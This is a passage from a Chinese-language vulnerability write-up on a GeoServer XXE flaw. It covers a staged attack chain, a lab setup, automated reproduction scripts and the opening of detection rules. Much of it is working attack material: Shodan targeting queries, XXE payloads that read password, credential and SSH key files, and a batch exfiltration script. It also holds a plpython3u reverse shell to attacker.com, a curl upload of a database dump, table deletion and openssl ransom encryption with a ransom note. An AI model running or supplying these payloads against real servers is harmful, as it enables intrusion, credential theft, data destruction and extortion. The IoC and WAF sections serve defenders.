├── 数据泄露: 下载敏感地理数据
├── 服务破坏: 篡改地图数据
└── 勒索攻击: 加密数据并索要赎金
8.2 各阶段详细分析
8.2.1 阶段1: 侦察和信息收集
使用搜索引擎发现目标:
Shodan查询:
title:"GeoServer" port:8080
title:"GeoServer" country:"US"
"GeoServer Configuration" port:8080
Shodan API自动化:
import shodan
api = shodan.Shodan('YOUR_API_KEY')
results = api.search('title:"GeoServer" port:8080')
for result in results['matches']:
print(f"{result['ip_str']}:{result['port']}")
print(f" Organization: {result.get('org', 'N/A')}")
print(f" Location: {result.get('location', {}).get('city', 'N/A')}")
ZoomEye查询:
app:"GeoServer"
Fofa查询:
app="GeoServer"
title="GeoServer"
版本指纹识别:
HTTP头检测:
curl -I http://target:8080/geoserver/web/
# 查找类似:
# Server: Jetty(9.4.48.v20220622)
# X-Frame-Options: SAMEORIGIN
GetCapabilities检测:
curl -s "http://target:8080/geoserver/wms?service=WMS&request=GetCapabilities" | grep -i "version"
# 输出示例:
# <WMS_Capabilities version="1.3.0">
# <Service>
# <Name>WMS</Name>
# <Title>GeoServer Web Map Service</Title>
# <OnlineResource>http://geoserver.org</OnlineResource>
# </Service>
Web界面检测:
curl -s http://target:8080/geoserver/web/ | grep -o "Version [0-9.]*"
# 输出: Version 2.26.1
8.2.2 阶段2: 漏洞识别和验证
基础XXE检测:
Payload:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE StyledLayerDescriptor [
<!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer>
<Name>&xxe;</Name>
</NamedLayer>
</StyledLayerDescriptor>
自动化检测脚本:
#!/bin/bash
TARGET="http://target:8080"
PAYLOAD='<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE StyledLayerDescriptor [
<!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer>
<Name>&xxe;</Name>
</NamedLayer>
</StyledLayerDescriptor>'
RESPONSE=$(curl -s -X POST "$TARGET/geoserver/wms?service=WMS&version=1.1.0&request=GetMap&width=100&height=100&format=image/png&bbox=-180,-90,180,90" \
-H "Content-Type: application/xml" \
-d "$PAYLOAD")
if echo "$RESPONSE" | grep -q "Unknown layer:"; then
echo "[+] VULNERABLE to XXE!"
LEAKED=$(echo "$RESPONSE" | grep -oP 'Unknown layer: \K[^<]+')
echo "[+] Leaked hostname: $LEAKED"
else
echo "[-] Not vulnerable or patched"
fi
8.2.3 阶段3: 漏洞利用
系统侦察:
读取系统信息:
# 操作系统版本
file:///etc/os-release
file:///proc/version
# 内核版本
file:///proc/version
# 网络配置
file:///etc/hosts
file:///etc/resolv.conf
# 进程信息
file:///proc/self/status
file:///proc/self/environ
file:///proc/self/cmdline
GeoServer配置:
# 全局配置
file:///opt/geoserver/data_dir/global.xml
# 日志配置(可能含敏感路径)
file:///opt/geoserver/data_dir/logging.xml
# 用户配置
file:///opt/geoserver/data_dir/security/usergroup/default/users.xml
数据库凭据:
# 数据存储配置
file:///opt/geoserver/data_dir/workspaces/topp/datastore.xml
# 示例内容:
<dataStore>
<connectionParameters>
<host>db.internal</host>
<port>5432</port>
<database>gisdata</database>
<user>geoserver</user>
<passwd>P@ssw0rd123</passwd>
</connectionParameters>
</dataStore>
SSH密钥:
file:///home/geoserveruser/.ssh/id_rsa
file:///home/geoserver/.ssh/id_rsa
file:///root/.ssh/id_rsa
8.2.4 阶段4: 数据泄露
批量文件读取脚本:
#!/usr/bin/env python3
"""批量文件读取工具"""
import requests
TARGET = "http://vulnerable-geoserver.com:8080"
OUTPUT_DIR = "/tmp/exfil"
FILES = [
"/etc/passwd",
"/etc/hostname",
"/opt/geoserver/data_dir/global.xml",
"/opt/geoserver/data_dir/security/usergroup/default/users.xml",
"/opt/geoserver/data_dir/workspaces/topp/datastore.xml"
]
def read_file(filepath):
payload = f'''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE StyledLayerDescriptor [
<!ENTITY xxe SYSTEM "file://{filepath}">
]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer>
<Name>&xxe;</Name>
</NamedLayer>
</StyledLayerDescriptor>'''
response = requests.post(
f"{TARGET}/geoserver/wms",
params={
"service": "WMS",
"version": "1.1.0",
"request": "GetMap",
"width": "100",
"height": "100",
"format": "image/png",
"bbox": "-180,-90,180,90"
},
headers={"Content-Type": "application/xml"},
data=payload,
timeout=10
)
if "Unknown layer:" in response.text:
content = response.text.split("Unknown layer:")[1].split("<")[0].strip()
# 保存到文件
safe_filename = filepath.replace("/", "_")[1:]
with open(f"{OUTPUT_DIR}/{safe_filename}", "w") as f:
f.write(content)
print(f"[+] Saved: {filepath}")
return content
else:
print(f"[-] Failed: {filepath}")
return None
import os
os.makedirs(OUTPUT_DIR, exist_ok=True)
for filepath in FILES:
read_file(filepath)
print(f"\n[+] All files saved to: {OUTPUT_DIR}")
8.2.5 阶段5: 横向移动
使用泄露的数据库凭据:
# 从datastore.xml中提取凭据
HOST=db.internal
PORT=5432
USER=geoserver
PASS=P@ssw0rd123
DB=gisdata
# 连接数据库
psql -h $HOST -p $PORT -U $USER -d $DB
# 枚举数据库
\l
\dt
# 查询敏感表
SELECT * FROM users;
SELECT * FROM credentials;
SELECT * FROM api_keys;
使用SSH密钥:
# 保存泄露的私钥
cat > /tmp/id_rsa <<EOF
-----BEGIN RSA PRIVATE KEY-----
[泄露的私钥内容]
-----END RSA PRIVATE KEY-----
EOF
chmod 600 /tmp/id_rsa
# SSH登录
ssh -i /tmp/id_rsa geoserveruser@target-server
SSRF访问内网:
<!-- 探测内网Web服务 -->
<!ENTITY xxe SYSTEM "http://10.0.1.100:8080/admin">
<!-- 访问内网API -->
<!ENTITY xxe SYSTEM "http://internal-api.local/v1/secrets">
<!-- 访问Kubernetes API -->
<!ENTITY xxe SYSTEM "https://10.96.0.1:443/api/v1/secrets">
8.2.6 阶段6: 权限提升
利用GeoServer管理界面:
如果获取到管理员凭据(从users.xml):
登录/geoserver/web/
导航至"数据存储"→"新建数据存储"
选择"JNDI"连接
注入JNDI LDAP payload(如适用其他漏洞)
或修改数据存储配置执行SQL
或通过REST API上传恶意插件
通过数据库权限提升:
-- 如果GeoServer数据库用户是DBA
CREATE EXTENSION IF NOT EXISTS plpython3u;
CREATE OR REPLACE FUNCTION exec_shell(cmd text)
RETURNS text AS $$
import subprocess
return subprocess.check_output(cmd, shell=True).decode()
$$ LANGUAGE plpython3u;
SELECT exec_shell('bash -c "bash -i >& /dev/tcp/attacker.com/4444 0>&1"');
8.2.7 阶段7: 目标达成
数据泄露:
# 下载所有Shapefile数据
wget -r -np -nH --cut-dirs=2 http://target:8080/geoserver/rest/workspaces/
# 导出PostgreSQL数据库
pg_dump -h db.internal -U geoserver gisdata > /tmp/gisdata.sql
# 上传到外部服务器
curl -F "file=@/tmp/gisdata.sql" http://attacker.com/upload
服务破坏:
-- 篡改地理数据
UPDATE boundaries SET geom = ST_GeomFromText('POINT(0 0)', 4326);
-- 删除关键图层
DROP TABLE critical_infrastructure;
勒索:
# 加密数据文件
find /opt/geoserver/data_dir -type f -exec openssl enc -aes-256-cbc -salt -in {} -out {}.enc -k "ransom_key" \;
# 留下勒索信
cat > /opt/geoserver/data_dir/README_RANSOM.txt <<EOF
Your GeoServer data has been encrypted.
Pay 10 BTC to recover: bc1q...
Contact: [email protected]
EOF
8.3 真实攻击场景示例
场景: 政府国土部门GeoServer入侵
初始访问:
攻击者通过Shodan发现政府GIS服务器
IP: 203.0.113.50
开放端口: 80 (Nginx) → 8080 (GeoServer 2.26.1)
漏洞利用:
# 读取GeoServer配置
curl -X POST "http://203.0.113.50/geoserver/wms?..." \
-d '<!ENTITY xxe SYSTEM "file:///opt/geoserver/data_dir/workspaces/land/datastore.xml">...'
# 泄露的数据库配置:
<host>10.10.1.100</host>
<database>land_registry</database>
<user>gis_app</user>
<passwd>GIS_2024_SecureP@ss</passwd>
横向移动:
# 连接后端数据库
psql -h 10.10.1.100 -U gis_app -d land_registry
# 发现表:
land_registry=> \dt
List of relations
Schema | Name | Type | Owner
----------+-----------------+-------+---------
public | property_owners | table | gis_app
public | land_parcels | table | gis_app
public | transactions | table | gis_app
# 泄露敏感数据
SELECT * FROM property_owners WHERE classification='sensitive';
影响:
数百万土地所有权记录泄露
关键基础设施位置暴露
国家安全风险
公众信任损害
8.4 攻击指标(IoC)
8.4.1 网络层指标
HTTP请求特征:
POST /geoserver/wms HTTP/1.1
Content-Type: application/xml
Content-Length: 200-500
Body contains:
- <!DOCTYPE
- <!ENTITY
- SYSTEM
- file:///
- http://169.254.169.254
User-Agent模式:
- python-requests
- curl/
- SecurityTest
- Nuclei
- sqlmap
异常请求频率:
短时间内大量POST请求到/wms
来自同一IP的重复类似请求
非正常工作时间的访问
出站连接:
到非法IP的HTTP请求(OOB XXE)
到169.254.169.254的连接(AWS元数据)
到内网IP的连接(SSRF)
8.4.2 主机层指标
文件访问异常:
# 审计日志模式
type=SYSCALL ... syscall=open ... success=yes ... name="/etc/passwd" ... exe="/usr/bin/java"
type=SYSCALL ... syscall=open ... success=yes ... name="/etc/shadow" ... exe="/usr/bin/java"
type=SYSCALL ... syscall=open ... success=yes ... name="/root/.ssh/id_rsa" ... exe="/usr/bin/java"
进程行为:
GeoServer Java进程访问非预期文件
Java进程发起异常网络连接
高CPU/内存占用(DoS攻击)
日志特征:
GeoServer日志中的XXE迹象:
- "Unknown layer: root:x:"
- "java.io.FileNotFoundException: /etc/passwd"
- "Connection refused: http://10.0.1.100"
8.4.3 应用层指标
ServiceException错误:
包含文件内容的错误消息
大量"Unknown layer"错误
来自同一IP的重复错误
响应时间异常:
GetMap请求响应时间超过正常值
表明正在读取大文件或进行SSRF
流量大小:
响应体包含大量文本(文件内容)
异常大的XML请求体
SIEM检测规则示例:
# Splunk查询
index=web sourcetype=access_combined uri="/geoserver/wms" method=POST
| search request_body="*<!DOCTYPE*" OR request_body="*<!ENTITY*"
| stats count by src_ip, uri
| where count > 5
# ELK查询
POST /logs/_search
{
"query": {
"bool": {
"must": [
{ "match": { "http.request.method": "POST" }},
{ "match": { "http.request.uri.path": "/geoserver/wms" }},
{ "regexp": { "http.request.body.content": ".*<!DOCTYPE.*<!ENTITY.*" }}
]
}
}
}
9. 环境搭建与复现
本章节基于2025年11月27日的实际成功复现经验编写。
9.1 Docker容器化环境
9.1.1 Docker Compose部署
推荐使用Docker Compose进行快速部署,以下配置已通过实际测试验证。
创建项目目录:
mkdir geoserver-xxe-lab
cd geoserver-xxe-lab
创建docker-compose.yml:
version: '3.8'
networks:
geoserver-net:
driver: bridge
ipam:
config:
- subnet: 172.28.0.0/16
services:
# 漏洞版本 - 用于漏洞复现
geoserver-vulnerable:
image: kartoza/geoserver:2.26.1
container_name: geoserver-vuln-cve-2025-58360
hostname: geoserver-vulnerable
ports:
- "8080:8080"
environment:
- GEOSERVER_ADMIN_USER=admin
- GEOSERVER_ADMIN_PASSWORD=geoserver
- GEOSERVER_CSRF_DISABLED=true
- STABLE_EXTENSIONS=
- COMMUNITY_EXTENSIONS=
volumes:
- vulnerable-data:/opt/geoserver/data_dir
networks:
geoserver-net:
ipv4_address: 172.28.0.10
restart: unless-stopped
healthcheck:
test: ["CMD", "curl", "-f", "http://localhost:8080/geoserver/web/"]
interval: 30s
timeout: 10s
retries: 5
start_period: 60s
# 修复版本 - 用于对比测试(可选)
# 注意: kartoza/geoserver:2.28.1或2.26.2可能不可用
# geoserver-patched:
# image: kartoza/geoserver:2.28.1
# container_name: geoserver-safe-cve-2025-58360
# ports:
# - "8081:8080"
# environment:
# - GEOSERVER_ADMIN_USER=admin
# - GEOSERVER_ADMIN_PASSWORD=geoserver
# volumes:
# - patched-data:/opt/geoserver/data_dir
# networks:
# geoserver-net:
# ipv4_address: 172.28.0.11
# restart: unless-stopped
volumes:
vulnerable-data:
driver: local
# patched-data:
# driver: local
9.1.2 启动和管理
启动服务:
# 启动容器
docker-compose up -d
# 实时查看日志
docker-compose logs -f geoserver-vulnerable
# 检查容器状态
docker-compose ps
预期输出:
NAME IMAGE STATUS
geoserver-vuln-cve-2025-58360 kartoza/geoserver:2.26.1 Up (healthy)
等待服务就绪:
# 方法1: 手动等待
sleep 90
# 方法2: 监控健康检查
while ! docker inspect --format='{{.State.Health.Status}}' geoserver-vuln-cve-2025-58360 | grep -q "healthy"; do
echo "Waiting for GeoServer to be healthy..."
sleep 5
done
echo "GeoServer is ready!"
# 方法3: HTTP检查
until curl -f -s http://localhost:8080/geoserver/web/ > /dev/null; do
echo "Waiting for GeoServer HTTP..."
sleep 5
done
echo "GeoServer HTTP is ready!"
停止服务:
# 停止容器
docker-compose down
# 完全清理(包括数据卷)
docker-compose down -v
9.1.3 访问服务
Web界面:
URL: http://localhost:8080/geoserver/web
用户名: admin
密码: geoserver
WMS端点:
GetCapabilities: http://localhost:8080/geoserver/wms?service=WMS&request=GetCapabilities
攻击目标: http://localhost:8080/geoserver/wms (POST)
验证版本:
curl -s http://localhost:8080/geoserver/web/ | grep -o "Version [0-9.]*"
# 输出: Version 2.26.1
获取容器信息(用于验证hostname泄露):
docker ps --format "{{.ID}} {{.Names}}" | grep geoserver
# 输出: a27840b7f332 geoserver-vuln-cve-2025-58360
9.2 手动安装部署
9.2.1 系统要求
硬件要求:
CPU: 2核心以上
内存: 4GB以上
磁盘: 10GB可用空间
软件要求:
Java: OpenJDK 11或Oracle JDK 11
操作系统: Linux/Windows/macOS
9.2.2 Linux安装步骤
Ubuntu/Debian系统:
# 1. 更新系统
sudo apt update
sudo apt upgrade -y
# 2. 安装Java 11
sudo apt install -y openjdk-11-jdk
# 验证Java版本
java -version
# 输出应包含: openjdk version "11.0.x"
# 3. 下载GeoServer 2.26.1(漏洞版本)
cd /opt
sudo wget https://sourceforge.net/projects/geoserver/files/GeoServer/2.26.1/geoserver-2.26.1-bin.zip
# 4. 解压安装
sudo unzip geoserver-2.26.1-bin.zip
sudo mv geoserver-2.26.1 geoserver
# 5. 创建专用用户
sudo useradd -r -s /bin/false -d /opt/geoserver geoserver
# 6. 设置权限
sudo chown -R geoserver:geoserver /opt/geoserver
sudo chmod -R 750 /opt/geoserver
# 7. 配置环境变量
sudo tee /etc/profile.d/geoserver.sh > /dev/null <<EOF
export GEOSERVER_HOME=/opt/geoserver
export GEOSERVER_DATA_DIR=/opt/geoserver/data_dir
EOF
source /etc/profile.d/geoserver.sh
# 8. 创建systemd服务(可选)
sudo tee /etc/systemd/system/geoserver.service > /dev/null <<EOF
[Unit]
Description=GeoServer
After=network.target
[Service]
Type=simple
User=geoserver
Group=geoserver
Environment="GEOSERVER_HOME=/opt/geoserver"
Environment="GEOSERVER_DATA_DIR=/opt/geoserver/data_dir"
ExecStart=/opt/geoserver/bin/startup.sh
ExecStop=/opt/geoserver/bin/shutdown.sh
Restart=on-failure
[Install]
WantedBy=multi-user.target
EOF
# 重新加载systemd
sudo systemctl daemon-reload
# 启动并启用服务
sudo systemctl start geoserver
sudo systemctl enable geoserver
# 9. 检查状态
sudo systemctl status geoserver
# 10. 查看日志
sudo tail -f /opt/geoserver/logs/geoserver.log
CentOS/RHEL系统:
# 1. 安装Java 11
sudo yum install -y java-11-openjdk java-11-openjdk-devel
# 2-10步骤与Ubuntu相同
9.2.3 Windows安装步骤
安装步骤:
下载并安装Java 11
访问 https://adoptium.net/
下载OpenJDK 11 Windows安装程序
运行安装程序,默认安装到C:\Program Files\Eclipse Adoptium\jdk-11.x.x
下载GeoServer
访问 https://sourceforge.net/projects/geoserver/files/GeoServer/2.26.1/
下载 geoserver-2.26.1-bin.zip
解压到目标目录,如C:\GeoServer
设置环境变量
setx GEOSERVER_HOME "C:\GeoServer" setx GEOSERVER_DATA_DIR "C:\GeoServer\data_dir" setx JAVA_HOME "C:\Program Files\Eclipse Adoptium\jdk-11.x.x"启动服务
cd C:\GeoServer\bin startup.bat安装为Windows服务(可选)
使用NSSM (Non-Sucking Service Manager):nssm install GeoServer "C:\GeoServer\bin\startup.bat" nssm start GeoServer
9.3 复现步骤
9.3.1 环境验证
检查服务是否正常运行:
# 检查HTTP响应
curl -I http://localhost:8080/geoserver/web/
# 预期输出:
# HTTP/1.1 302 Found
# Location: http://localhost:8080/geoserver/web/
获取服务能力:
curl -s "http://localhost:8080/geoserver/wms?service=WMS&request=GetCapabilities" | head -20
# 预期包含:
# <?xml version="1.0"?>
# <WMS_Capabilities version="1.3.0">
9.3.2 基础XXE测试
测试1: Hostname读取(实际复现成功)
创建payload文件:
cat > /tmp/xxe_hostname.xml <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE StyledLayerDescriptor [
<!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer>
<Name>&xxe;</Name>
</NamedLayer>
</StyledLayerDescriptor>
EOF
发送请求:
curl -X POST "http://localhost:8080/geoserver/wms?service=WMS&version=1.1.0&request=GetMap&width=100&height=100&format=image/png&bbox=-180,-90,180,90" \
-H "Content-Type: application/xml" \
-d @/tmp/xxe_hostname.xml \
-o /tmp/xxe_hostname_result.xml
# 查看结果
cat /tmp/xxe_hostname_result.xml
预期响应:
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE ServiceExceptionReport SYSTEM "http://localhost:8080/geoserver/schemas/wms/1.1.1/WMS_exception_1_1_1.dtd">
<ServiceExceptionReport version="1.1.1">
<ServiceException>
Unknown layer: a27840b7f332
</ServiceException>
</ServiceExceptionReport>
验证结果:
# 提取泄露的hostname
LEAKED_HOSTNAME=$(grep -oP 'Unknown layer: \K[^<]+' /tmp/xxe_hostname_result.xml)
echo "Leaked hostname: $LEAKED_HOSTNAME"
# 获取实际容器ID
ACTUAL_CONTAINER_ID=$(docker ps --format "{{.ID}}" | head -1)
echo "Actual container ID: $ACTUAL_CONTAINER_ID"
# 比较
if [ "$LEAKED_HOSTNAME" = "$ACTUAL_CONTAINER_ID" ]; then
echo "[+] XXE SUCCESSFUL! Hostname matches container ID"
else
echo "[-] Hostname mismatch or XXE failed"
fi
测试2: /etc/passwd读取(实际复现成功)
Payload:
cat > /tmp/xxe_passwd.xml <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE StyledLayerDescriptor [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer>
<Name>&xxe;</Name>
</NamedLayer>
</StyledLayerDescriptor>
EOF
发送并查看:
curl -s -X POST "http://localhost:8080/geoserver/wms?service=WMS&version=1.1.0&request=GetMap&width=100&height=100&format=image/png&bbox=-180,-90,180,90" \
-H "Content-Type: application/xml" \
-d @/tmp/xxe_passwd.xml \
| tee /tmp/xxe_passwd_result.xml
# 检查结果
if grep -q "root:x:0:0" /tmp/xxe_passwd_result.xml; then
echo "[+] SUCCESS! /etc/passwd leaked"
echo "[+] Extracting user list:"
grep -oP 'Unknown layer: \K.*' /tmp/xxe_passwd_result.xml | tr '\n' ' ' | sed 's/<\/ServiceException.*//' | tr ' ' '\n'
else
echo "[-] Failed to read /etc/passwd"
fi
预期输出示例:
[+] SUCCESS! /etc/passwd leaked
[+] Extracting user list:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
geoserveruser:x:1000:1000::/home/geoserveruser/:/bin/bash
9.3.3 GeoServer配置文件读取
读取全局配置:
cat > /tmp/xxe_global.xml <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE StyledLayerDescriptor [
<!ENTITY xxe SYSTEM "file:///opt/geoserver/data_dir/global.xml">
]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer>
<Name>&xxe;</Name>
</NamedLayer>
</StyledLayerDescriptor>
EOF
curl -s -X POST "http://localhost:8080/geoserver/wms?service=WMS&version=1.1.0&request=GetMap&width=100&height=100&format=image/png&bbox=-180,-90,180,90" \
-H "Content-Type: application/xml" \
-d @/tmp/xxe_global.xml
读取用户配置:
cat > /tmp/xxe_users.xml <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE StyledLayerDescriptor [
<!ENTITY xxe SYSTEM "file:///opt/geoserver/data_dir/security/usergroup/default/users.xml">
]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer>
<Name>&xxe;</Name>
</NamedLayer>
</StyledLayerDescriptor>
EOF
curl -s -X POST "http://localhost:8080/geoserver/wms?service=WMS&version=1.1.0&request=GetMap&width=100&height=100&format=image/png&bbox=-180,-90,180,90" \
-H "Content-Type: application/xml" \
-d @/tmp/xxe_users.xml
9.3.4 SSRF测试
注意: SSRF测试需要根据您的实际环境调整目标URL。
探测本地服务:
# 探测localhost:22 (SSH)
cat > /tmp/xxe_ssrf_ssh.xml <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE StyledLayerDescriptor [
<!ENTITY xxe SYSTEM "http://127.0.0.1:22/">
]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer>
<Name>&xxe;</Name>
</NamedLayer>
</StyledLayerDescriptor>
EOF
curl -s -X POST "http://localhost:8080/geoserver/wms?service=WMS&version=1.1.0&request=GetMap&width=100&height=100&format=image/png&bbox=-180,-90,180,90" \
-H "Content-Type: application/xml" \
-d @/tmp/xxe_ssrf_ssh.xml
9.3.5 自动化测试脚本
完整的自动化测试脚本(基于实际复现开发):
#!/bin/bash
#
# GeoServer CVE-2025-58360 自动化复现脚本
# 基于2025-11-27实际复现经验
#
set -e
# 颜色定义
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
CYAN='\033[0;36m'
NC='\033[0m' # No Color
# 配置
TARGET="${1:-http://localhost:8080}"
OUTPUT_DIR="/tmp/xxe_results_$(date +%Y%m%d_%H%M%S)"
# 创建输出目录
mkdir -p "$OUTPUT_DIR"
echo -e "${CYAN}========================================${NC}"
echo -e "${CYAN}GeoServer CVE-2025-58360 自动化测试${NC}"
echo -e "${CYAN}========================================${NC}"
echo -e "${YELLOW}目标: $TARGET${NC}"
echo -e "${YELLOW}输出: $OUTPUT_DIR${NC}"
echo -e ""
# 测试函数
test_xxe() {
local test_name="$1"
local payload_file="$2"
local expected_pattern="$3"
echo -e "${YELLOW}[*] 测试: $test_name${NC}"
local result_file="$OUTPUT_DIR/${test_name// /_}.xml"
curl -s -X POST "$TARGET/geoserver/wms?service=WMS&version=1.1.0&request=GetMap&width=100&height=100&format=image/png&bbox=-180,-90,180,90" \
-H "Content-Type: application/xml" \
-d @"$payload_file" \
-o "$result_file"
if grep -q "$expected_pattern" "$result_file"; then
echo -e "${GREEN}[+] 成功: $test_name${NC}"
echo -e "${GREEN}[+] 结果已保存: $result_file${NC}"
# 提取并显示泄露的内容
if grep -q "Unknown layer:" "$result_file"; then
local leaked=$(grep -oP 'Unknown layer: \K[^<]+' "$result_file" | head -20)
echo -e "${CYAN}泄露内容预览:${NC}"
echo "$leaked"
fi
echo ""
return 0
else
echo -e "${RED}[-] 失败: $test_name${NC}"
echo ""
return 1
fi
}
# 准备payload文件
prepare_payloads() {
cat > "$OUTPUT_DIR/payload_hostname.xml" <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE StyledLayerDescriptor [
<!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer>
<Name>&xxe;</Name>
</NamedLayer>
</StyledLayerDescriptor>
EOF
cat > "$OUTPUT_DIR/payload_passwd.xml" <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE StyledLayerDescriptor [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer>
<Name>&xxe;</Name>
</NamedLayer>
</StyledLayerDescriptor>
EOF
cat > "$OUTPUT_DIR/payload_hosts.xml" <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE StyledLayerDescriptor [
<!ENTITY xxe SYSTEM "file:///etc/hosts">
]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer>
<Name>&xxe;</Name>
</NamedLayer>
</StyledLayerDescriptor>
EOF
cat > "$OUTPUT_DIR/payload_version.xml" <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE StyledLayerDescriptor [
<!ENTITY xxe SYSTEM "file:///proc/version">
]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer>
<Name>&xxe;</Name>
</NamedLayer>
</StyledLayerDescriptor>
EOF
cat > "$OUTPUT_DIR/payload_global.xml" <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE StyledLayerDescriptor [
<!ENTITY xxe SYSTEM "file:///opt/geoserver/data_dir/global.xml">
]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer>
<Name>&xxe;</Name>
</NamedLayer>
</StyledLayerDescriptor>
EOF
}
# 运行测试
run_tests() {
local success=0
local total=0
# 测试1: Hostname
total=$((total + 1))
if test_xxe "Hostname 读取" "$OUTPUT_DIR/payload_hostname.xml" "Unknown layer:"; then
success=$((success + 1))
fi
# 测试2: /etc/passwd
total=$((total + 1))
if test_xxe "/etc/passwd 读取" "$OUTPUT_DIR/payload_passwd.xml" "root:x:"; then
success=$((success + 1))
fi
# 测试3: /etc/hosts
total=$((total + 1))
if test_xxe "/etc/hosts 读取" "$OUTPUT_DIR/payload_hosts.xml" "Unknown layer:"; then
success=$((success + 1))
fi
# 测试4: /proc/version
total=$((total + 1))
if test_xxe "/proc/version 读取" "$OUTPUT_DIR/payload_version.xml" "Unknown layer:"; then
success=$((success + 1))
fi
# 测试5: GeoServer global.xml
total=$((total + 1))
if test_xxe "GeoServer配置读取" "$OUTPUT_DIR/payload_global.xml" "Unknown layer:"; then
success=$((success + 1))
fi
echo -e "${CYAN}========================================${NC}"
echo -e "${CYAN}测试完成${NC}"
echo -e "${CYAN}========================================${NC}"
echo -e "${GREEN}成功: $success / $total${NC}"
if [ $success -gt 0 ]; then
echo -e "${RED}[!] 目标易受CVE-2025-58360攻击!${NC}"
echo -e "${RED}[!] 建议立即升级至GeoServer 2.25.6+, 2.26.2+, 或2.28.1+${NC}"
else
echo -e "${GREEN}[+] 目标似乎已修复或受保护${NC}"
fi
echo -e ""
echo -e "${YELLOW}所有结果已保存至: $OUTPUT_DIR${NC}"
}
# 主流程
main() {
echo -e "${YELLOW}[*] 准备payload文件...${NC}"
prepare_payloads
echo -e "${YELLOW}[*] 开始测试...${NC}"
echo ""
run_tests
}
# 执行
main
使用方法:
chmod +x test_xxe.sh
# 测试本地GeoServer
./test_xxe.sh http://localhost:8080
# 测试远程目标
./test_xxe.sh http://target.example.com:8080
预期输出示例:
========================================
GeoServer CVE-2025-58360 自动化测试
========================================
目标: http://localhost:8080
输出: /tmp/xxe_results_20251127_015045
[*] 准备payload文件...
[*] 开始测试...
[*] 测试: Hostname 读取
[+] 成功: Hostname 读取
[+] 结果已保存: /tmp/xxe_results_20251127_015045/Hostname_读取.xml
泄露内容预览:
a27840b7f332
[*] 测试: /etc/passwd 读取
[+] 成功: /etc/passwd 读取
[+] 结果已保存: /tmp/xxe_results_20251127_015045/_etc_passwd_读取.xml
泄露内容预览:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
========================================
测试完成
========================================
成功: 5 / 5
[!] 目标易受CVE-2025-58360攻击!
[!] 建议立即升级至GeoServer 2.25.6+, 2.26.2+, 或2.28.1+
所有结果已保存至: /tmp/xxe_results_20251127_015045
9.4 对比测试(漏洞版本vs修复版本)
如果您部署了两个版本,可以进行对比测试:
对比脚本:
#!/bin/bash
VULN_TARGET="http://localhost:8080"
SAFE_TARGET="http://localhost:8081"
PAYLOAD='<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE StyledLayerDescriptor [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer>
<Name>&xxe;</Name>
</NamedLayer>
</StyledLayerDescriptor>'
echo "测试漏洞版本 ($VULN_TARGET):"
curl -s -X POST "$VULN_TARGET/geoserver/wms?service=WMS&version=1.1.0&request=GetMap&width=100&height=100&format=image/png&bbox=-180,-90,180,90" \
-H "Content-Type: application/xml" \
-d "$PAYLOAD" | grep -oP '(Unknown layer:.*?<|Entity resolution disallowed)'
echo ""
echo "测试修复版本 ($SAFE_TARGET):"
curl -s -X POST "$SAFE_TARGET/geoserver/wms?service=WMS&version=1.1.0&request=GetMap&width=100&height=100&format=image/png&bbox=-180,-90,180,90" \
-H "Content-Type: application/xml" \
-d "$PAYLOAD" | grep -oP '(Unknown layer:.*?<|Entity resolution disallowed)'
预期对比结果:
测试漏洞版本 (http://localhost:8080):
Unknown layer: root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
测试修复版本 (http://localhost:8081):
Entity resolution disallowed for SYSTEM
10. 检测方法
10.1 网络层检测
10.1.1 WAF规则
ModSecurity规则集:
# CVE-2025-58360 GeoServer XXE检测和防护规则
# 文件: /etc/modsecurity/rules/geoserver-xxe.conf
# 规则1: 检测POST到WMS端点的XML请求
SecRule REQUEST_URI "@contains /wms" \
"id:100001,\
phase:1,\
t:none,\
log,\
msg:'GeoServer WMS endpoint accessed',\
tag:'CVE-2025-58360',\
chain"
SecRule REQUEST_METHOD "@streq POST" \
"chain"
SecRule REQUEST_HEADERS:Content-Type "@contains xml" \
"setvar:tx.xxe_score=+1"
# 规则2: 检测XML中的DOCTYPE声明
SecRule REQUEST_URI "@contains /wms" \
"id:100002,\
phase:2,\
t:none,\
